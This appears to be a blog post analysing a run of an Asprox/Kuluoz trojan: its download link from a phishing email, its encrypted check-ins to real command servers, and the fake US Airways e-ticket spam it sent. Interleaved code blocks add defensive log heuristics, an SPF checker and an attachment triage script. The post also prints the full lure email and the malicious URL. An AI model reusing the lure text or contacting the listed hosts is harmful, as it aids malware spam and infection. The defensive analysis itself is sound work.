
The initial trojan

I took a trojan horse from an Asprox malware email and ran it on a computer I had sitting around, and this is what I found.

Around 23 November 2013, the trojan was downloaded from:

blindfische.de /voice.php ?message=bbJlwJlqFp...s0CQ=

I got the link from a fake WhatsApp Voice Mail Notification email.

This, using specific user-agents, yielded a zip file that contained a fake voice mail exe file. These Asprox botnet trojans are often called Kuluoz and Dofoil.

On 16 December 2013, I ran the trojan. I expected it would be too out-of-date, but it worked.

Timeline of network traffic

I had network traffic capture running from boot. At around 108.00 seconds I double-clicked the EXE file.

109.44   http://70.32.79.44:8080/E2205D9... POSTs encrypted multipart/form-data key.bin and data.bin and got over 400k response.

171.94   http://70.32.79.44:8080/E2205D9... POSTs encrypted multipart/form-data key.bin and data.bin and got about a 57k response.

173.72   tries an smtp connection to a gmail server but sends nothing. In retrospect I wonder if it is checking to see if port 25 is blocked or open, like a spambot eligibility check.

173.89   http://50.31.146.101:8080/cb/board.pl POSTs encrypted multipart/form-data CKEY and CDATA and got about a 120k response.

182.46   tries smtp to spam the first person. Denied.

182.49   (stream 9) first successful transmission of malware spam to an email account.

233.93  http://70.32.79.44:8080/E2205D9... POSTs encrypted multipart/form-data key.bin and data.bin and got about an 11k response.

294.94  http://70.32.79.44:8080/E2205D9... POSTs encrypted multipart/form-data key.bin and data.bin and got about 500 byte response.

371.28   machine shut down. Stream 480 was probably the last successful smtp connection.

Probably roughly 400 emails tried and about half that delivered.

The contacts:

In this sample, my trojan contacted 2 IP addresses via HTTP.

70.32.79.44, which happens to be the IP of the website for the Gunnebo Johnson Corporation, a lifting equipment accessory maker, www.gunnebojohnson.com at the time this test was run.

The communications are of the style explained by Kimberly at StopMalvertising.com: here, with a Hex GET string and encrypted multipart/form-data key.bin, data.bin POSTs to port 8080 and encrypted response back.

The infected computer contacted 70.32.79.44 a total of 4 times and got back correct responses each time during the run. The responses were different sizes each time.

Post:

POST /E2205D986D83870712B9AB35050326E78D8115D63B HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=oSxW0lKfMIDchpiX5LrO1dz1
Content-Length: 594
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Host: 70.32.79.44:8080
Cache-Control: no-cache
oSxW0lKfMIDchpiX5LrO1dz1
Content-Disposition: form-data; name="key"; filename="key.bin"
Content-Type: application/octet-stream
.b...U.r*{.`..I......Yd..~..lPN...fX....1V..f3..8.oCd.@^dwHC._.h.HGC.F....... ..6.w...~.<*$.8......54. .
&....b(..}UP.D...]dQB6N.
--oSxW0lKfMIDchpiX5LrO1dz1
Content-Disposition: form-data; name="data"; filename="data.bin"
Content-Type: application/octet-stream
~..U........IU^.
....n.->ij...z.J.
..4(.N3....E';....NJ.<i......$..p..R..9S..Dc.........v....Oo.7..u.?...D.*...J_..G>u=.K...*..`}.~..S..{...Q`
.\..@.i..Gz?.|...g.V
--oSxW0lKfMIDchpiX5LrO1dz1--

And response:

HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Tue, 17 Dec 2013 04:29:54 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
f78 .......s..l.@..I.......]8;E.....D.1.9u.s.. .... and about 431k more bytes .....

50.31.146.101 looks like rented VPS space at hosting company ServerCentral.

The communications are LIKE the canonical "asprox new style" detailed by Kimberly above, but with several differences.

The post is to: 50.31.146.101:8080/cb/board.pl instead of some hexadecimal string URL. It posts multipart/form-data but calls the parts CKEY and CDATA.

Post:

POST /cb/board.pl HTTP/1.1
Host: 50.31.146.101:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 471
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="CKEY"
T...7&......Y.Q....;.Z.....4-....<....F.x1HD..s%...s..Qzh..H.S.:&.`.......I>..%..3..:gIL
H.#].V`.......&....az\.y..m >.?3.|F....
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="CDATA"
..@..[.mY......B...'.."Vf-....=F./.&.o...
.r..86..A...h.Z......tQ@N.j...)...[..R............l*...)ip..]: }....Q.[e...T....NT.......H.A...w .].J...C0.[.
.0.z.(.A..."...... .5
--1BEF0A57BE110FD467A--

And response back:

HTTP/1.1 200 OK
Server: nginx/1.2.6
Date: Tue, 17 Dec 2013 04:30:59 GMT
Content-Type: multipart/form-data; boundary="1BEF0A57BE110FD467A"
Content-Length: 120782
Connection: close
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="CDATA"; filename="CDATA.BIN"
Content-Type: application/octet-stream

..@..[.mY......kE..o...........;..D.&..g.6UA. .... and about 121k more bytes ....

It is possible that this transaction was the "be a spammer" module with the spam layout, email list, and zip file like a kit, since the SMTP'ing malware started after this stream.
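The two check-in patterns above (POSTs to port 8080 with either a long hexadecimal path and key.bin/data.bin parts, or /cb/board.pl with CKEY/CDATA parts) and the burst of outbound port-25 connections in the timeline are both things a network defender can look for in logs. The following is an added example, not code from the post, that runs two such heuristics over constructed proxy-style and flow-style log lines; the log formats, the documentation-range IP addresses and the threshold values are assumptions chosen for the illustration.

```python
"""Detection heuristics for the Asprox-style traffic described in the post.

Added example with constructed log lines (not captured traffic from the post).
  1. HTTP POSTs to port 8080 whose path is a long hex string or /cb/board.pl,
     carrying multipart/form-data: the C2 check-in pattern.
  2. One internal host opening many outbound TCP/25 connections in a short
     window: the spam-run pattern.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed proxy-style lines: "<t> <src> <method> <url> <content-type>"
HTTP_LOG = """\
109.44 10.0.0.5 POST http://203.0.113.10:8080/E2205D986D83870712B9AB35050326E78D8115D63B multipart/form-data
110.10 10.0.0.5 GET http://example.com/index.html -
173.89 10.0.0.5 POST http://198.51.100.7:8080/cb/board.pl multipart/form-data
180.00 10.0.0.9 POST http://intranet.example/api/upload multipart/form-data
"""

# Constructed flow-style lines: "<t> <src> <dst> <dport>"
FLOW_LOG = """\
173.72 10.0.0.5 192.0.2.1 25
182.46 10.0.0.5 192.0.2.2 25
182.49 10.0.0.5 192.0.2.3 25
183.00 10.0.0.5 192.0.2.4 25
184.00 10.0.0.9 192.0.2.50 443
"""

HEX_PATH = re.compile(r"^/[0-9A-Fa-f]{32,}$")   # hex-string check-in URL
KNOWN_PATHS = {"/cb/board.pl"}                  # path seen in the second C2


def suspicious_http(log: str):
    """Return (time, src, host, path) for POSTs matching the check-in pattern."""
    hits = []
    for line in log.splitlines():
        t, src, method, url, ctype = line.split()
        u = urlsplit(url)
        if method != "POST" or u.port != 8080 or "multipart/form-data" not in ctype:
            continue
        if HEX_PATH.match(u.path) or u.path in KNOWN_PATHS:
            hits.append((float(t), src, u.hostname, u.path))
    return hits


def smtp_bursts(log: str, window: float = 60.0, threshold: int = 3):
    """Map src -> count for hosts that open >= threshold outbound TCP/25
    connections within `window` seconds (workstations normally open none)."""
    by_src = defaultdict(list)
    for line in log.splitlines():
        t, src, _dst, dport = line.split()
        if dport == "25":
            by_src[src].append(float(t))
    flagged = {}
    for src, times in by_src.items():
        times.sort()
        for i in range(len(times)):
            j = i
            while j < len(times) and times[j] - times[i] <= window:
                j += 1
            if j - i >= threshold:
                flagged[src] = j - i
                break
    return flagged


if __name__ == "__main__":
    for hit in suspicious_http(HTTP_LOG):
        print("C2 check-in candidate:", hit)
    for src, n in smtp_bursts(FLOW_LOG).items():
        print(f"possible spam run from {src}: {n} SMTP connections")
```

The HTTP heuristic deliberately requires all three features (POST, port 8080, multipart body) so that ordinary form uploads to internal services are not flagged; the SMTP heuristic is most useful on segments where only the mail relay is expected to talk to port 25.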

The Malware Spam Email:

As soon as I saw the SMTP streams I recognized the Fake Airline Ticket Malware email that flared up in mid-December 2013.

This fake Airline Ticket series has versions for Delta, American Airlines, US Airways, and probably many others. The content of the emails changes: arrival destination, total price, ticket number, etc. can vary from mail to mail. BUT every email from my infected machine had the same email content and attachment, and spoofed the same domain: usairways.com.

Here is one:

220 mx.google.com ESMTP w9si12827645iga.3 - gsmtp
HELO usairways.com
250 mx.google.com at your service
MAIL FROM: <ticket_support.7 @usairways.com>
250 2.1.0 OK w9si12827645iga.3 - gsmtp
RCPT TO: <jogo @creedek12.net>
250 2.1.5 OK w9si12827645iga.3 - gsmtp
DATA
354 Go ahead w9si12827645iga.3 - gsmtp
Message-ID: <000601cefae91ed1cf507a01a8c0 @timmy-8a19bc484>
From: "US Airways Ticket" <ticket_support.7 @usairways.com>
To: <jogo @creedek12.net>
Subject: Your order #186559 has been completed
Date: Mon, 16 Dec 2013 21:30:39 -0700
MIME-Version: 1.0
Content-Type: multipart/mixed;
 boundary="----=_NextPart_000_0003_01CEFAA6.10ACFA90"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: XimianEvolution1.4.6
X-MimeOLE: Produced By XimianEvolution1.4.6

This is a multi-part message in MIME format.

------=_NextPart_000_0003_01CEFAA6.10ACFA90
Content-Type: multipart/alternative;
 boundary="----=_NextPart_001_0004_01CEFAA6.10ACFA90"

------=_NextPart_001_0004_01CEFAA6.10ACFA90
Content-Type: text/plain;
 charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
This is your e-ticked receipt.

TICKET TYPE / TICKET NUMBER / EH533917128
SEAT / 54A/ZONE 1
DATE / TIME 16 JANUARY, 2014, 12:55 PM
ARRIVING / Little Rock
ST / OK
REF / OE.1918 BAG / 4PC

TOTAL PRICE / 612.21 USD
FORM OF PAYMENT / CC

Your bought ticket is attached.
To use your e-ticket you should print it.

Best regards,
US Airways Customer Services.

------=_NextPart_001_0004_01CEFAA6.10ACFA90
Content-Type: text/html;
 charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<BODY>
This is your e-ticked receipt. <BR>
<BR>
TICKET TYPE / TICKET NUMBER / EH533917128 <BR>
SEAT / 54A/ZONE 1 <BR>
DATE / TIME 16 JANUARY, 2014, 12:55 PM <BR>
ARRIVING / Little Rock <BR>
ST / OK <BR>
REF / OE.1918
BAG / 4PC <BR>
<BR>
TOTAL PRICE / 612.21 USD <BR>
FORM OF PAYMENT / CC <BR>
<BR>
Your bought ticket is attached. <BR>
To use your e-ticket you should print it. <BR>
<BR>
<BR>
Best regards,<BR>
US Airways Customer Services.<BR>
<BR>
<BR>
<BR>
</BODY>
</HTML>
------=_NextPart_001_0004_01CEFAA6.10ACFA90--
------=_NextPart_000_0003_01CEFAA6.10ACFA90
Content-Type: application/x-zip-compressed;
 name="US_Airways_E-Ticket_NO23880.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
 filename="US_Airways_E-Ticket_NO23880.zip"
UEsDBBQAAAAIAMI4kENFdQyhpJYBAKCCAgAcAAAARS1UaWNrZXR ..... and a LOT more
base64 encoded stuff that makes up the zip file ....

Out of curiosity, I checked for jogo @creedek12.net and it is real, a Colorado school district that uses hosted Gmail I suppose.

People sometimes wonder how spammers get their email address. This is one way.

And because for some reason that Gmail setup doesn't check for SPF, such an email gets through, although I'm sure the filters and scanners would still have caught it. In this transaction, an ISP blocks on SPF failure:

220-nex2.nextordns.com.mx ESMTP Exim 4.82 #2 Mon, 16 Dec 2013 22:33:31 -0600 
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
HELO usairways.com
250 nex2.nextordns.com.mx Hello host-[my external rdns redacted].com [my external ip redacted]
MAIL FROM: <ticket_371 @usairways.com>
250 OK
RCPT TO: <jogomez @crediamigo.com.mx>
550 SPF: 74.211.2.84 is not allowed to send mail from usairways.com
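The 550 above is the receiving server evaluating the sender's SPF record: the connecting IP is not listed as an authorized sender for the domain given in MAIL FROM, so the spoofed usairways.com envelope is refused before DATA. As an added example that is not part of the post, the following minimal SPF evaluator shows that decision for the ip4 and all mechanisms. The records, domain names and IP addresses are constructed for the illustration (they are not the real DNS records of any airline), and the evaluator does not resolve include, a, mx or exists mechanisms, which need DNS; a real receiver such as the Exim instance above does.

```python
"""Minimal offline SPF evaluation (ip4/ip6/all mechanisms only).

Added example. Records and addresses are constructed, not real DNS data.
"""
import ipaddress

# Constructed SPF records keyed by MAIL FROM domain (hypothetical domains).
SPF_RECORDS = {
    "usairways.example": "v=spf1 ip4:192.0.2.0/24 ip4:198.51.100.17 -all",
    "softfail.example": "v=spf1 ip4:203.0.113.0/24 ~all",
}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def check_spf(sender_ip: str, mail_from_domain: str, records=SPF_RECORDS) -> str:
    """Return the SPF result ("pass", "fail", "softfail", "neutral", "none")
    for a connection from sender_ip claiming mail_from_domain."""
    record = records.get(mail_from_domain)
    if record is None or not record.startswith("v=spf1"):
        return "none"               # no policy published for the domain
    ip = ipaddress.ip_address(sender_ip)
    for term in record.split()[1:]:
        qualifier = "+"             # mechanisms default to a "pass" qualifier
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.partition(":")
        name = name.lower()
        if name == "all":
            return QUALIFIERS[qualifier]      # catch-all, usually -all or ~all
        if name in ("ip4", "ip6"):
            net = ipaddress.ip_network(arg, strict=False)
            if ip.version == net.version and ip in net:
                return QUALIFIERS[qualifier]
            continue
        # include/a/mx/exists require DNS lookups; this offline example
        # treats them as non-matching and moves on to the next term.
    return "neutral"                # record ended without a match


def smtp_verdict(sender_ip: str, mail_from_domain: str) -> str:
    """The reply a receiver enforcing hard SPF failure would give at RCPT TO."""
    if check_spf(sender_ip, mail_from_domain) == "fail":
        return f"550 SPF: {sender_ip} is not allowed to send mail from {mail_from_domain}"
    return "250 OK"


if __name__ == "__main__":
    # A spoofed HELO/MAIL FROM from an unlisted (constructed) address is refused.
    print(smtp_verdict("203.0.113.77", "usairways.example"))
    print(smtp_verdict("192.0.2.10", "usairways.example"))
```

Note that a domain with no SPF record, or one ending in ~all or ?all, will not produce a 550 here; that is exactly the gap the post observes when the message to the hosted Gmail recipient is accepted at the SMTP stage and left to content filters.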

It looks like a Barracuda will tell you to your face:

220 Barracuda SOLINT
HELO usairways.com
250 barracuda2.solint.cl Hello host-[my external rdns redacted].com [my external ip redacted],
pleased to meet you
MAIL FROM: <ticket_526 @usairways.com>
250 Sender <ticket_526 @usairways.com> OK
RCPT TO: <jogomez @edelpa.cl>
250 Recipient <jogomez @edelpa.cl> OK
DATA
354 Start mail input; end with <CRLF>.<CRLF>
Message-ID: <002601cefae96b0e66107a01a8c0 @timmy-8a19bc484>
From: "US Airways Ticket" <ticket_526 @usairways.com>
To: <jogomez @edelpa.cl>
Subject: Ticket is ready
Date: Mon, 16 Dec 2013 21:32:47 -0700
MIME-Version: 1.0
Content-Type: multipart/mixed;
 boundary="----=_NextPart_000_0020_01CEFAA6.5CE99490"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: XimianEvolution1.4.6
X-MimeOLE: Produced By XimianEvolution1.4.6 ......
This is a multi-part message in MIME format.
.... email here ...
554 rejected due to virus

The Attachment:

The email had a base64 encoded attachment. Simply copy-pasting it into a text file and running:

~ $ base64 -d sourcefile > destfile

~ $ file destfile
destfile: Zip archive data, at least v2.0 to extract

~ $ unzip destfile
Archive: destfile
inflating: E-Ticket_US-Air_Document.exe
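The same triage can be scripted at a mail gateway or in a sandbox: decode the base64 part, confirm it is really a zip from its magic bytes, and inspect the members for executables hiding behind document-like names. The following is an added example, not code from the post; it builds its own constructed sample attachment (a zip holding a dummy file with an MZ header) rather than using the real one, and the executable-extension list is an assumption.

```python
"""Decode and triage a base64 zip attachment for executables.

Added example. The sample attachment is constructed here, not taken from
the spam run described in the post.
"""
import base64
import io
import os
import zipfile

# Extensions that Windows will execute directly (assumed list).
EXEC_EXT = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs", ".jar"}


def build_sample_attachment() -> str:
    """Constructed sample: a zip whose only member is named like an e-ticket
    document but starts with the PE/DOS 'MZ' magic. Returns base64 text as it
    would appear in the MIME part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("E-Ticket_US-Air_Document.exe", b"MZ" + b"\x00" * 64)
    return base64.b64encode(buf.getvalue()).decode("ascii")


def build_benign_attachment() -> str:
    """Constructed control case: a zip containing a plain text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("itinerary.txt", b"Flight details go here.\n")
    return base64.b64encode(buf.getvalue()).decode("ascii")


def triage_attachment(b64_text: str) -> dict:
    """Decode base64 (ignoring line breaks), check the zip magic, and list
    members whose name or first bytes mark them as executables."""
    raw = base64.b64decode("".join(b64_text.split()))
    report = {"is_zip": raw[:2] == b"PK", "members": [], "suspicious": []}
    if not report["is_zip"]:
        return report
    with zipfile.ZipFile(io.BytesIO(raw)) as z:
        for info in z.infolist():
            name = info.filename
            report["members"].append(name)
            ext = os.path.splitext(name)[1].lower()
            with z.open(info) as member:
                head = member.read(2)       # read only the magic, not the whole file
            if ext in EXEC_EXT or head == b"MZ":
                report["suspicious"].append(name)
    return report


if __name__ == "__main__":
    print(triage_attachment(build_sample_attachment()))
    print(triage_attachment(build_benign_attachment()))
```

Checking both the extension and the leading bytes matters: a renamed executable fails the extension test but still starts with MZ, and a script with an executable extension has no MZ header but is still launched by a double-click.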

We have come full circle. A brand-new shiny, up-to-date Dofoil / Kuluoz Asprox trojan.

The zip, aka US_Airways_E-Ticket_NO13526.zip

VirusTotal report

The exe, E-Ticket_US-Air_Document.exe aka E-Ticket_AA_Air_Print_Document.exe

VirusTotal report 

Avast Win32:Malware-gen
ESET-NOD32 Win32/TrojanDownloader.Zortob.B
Fortinet W32/Injector.ATQX!tr
Microsoft TrojanDownloader:Win32/Kuluoz.D
Symantec Trojan.Fakeavlock
TrendMicro TROJ_INJECTO.CNC
Sophos Troj/Agent-AFGA
McAfee RDN/Generic.tfr!dt
Rising PE:Malware.FakeDOC@CV!1.9C3C
AVG Inject2.LPA
F-Secure Gen:Variant.Symmi.36797

So now you know where these emails come from. I could repeat this whole process now with the new exe file.

It seems though, that infected machines are assigned work to do. I have had a machine do advertisement fraud (impression laundering) which I still need to write up. And now I've had a spammer.

It SEEMS to me that someone could do something with the information they get from running these trojans.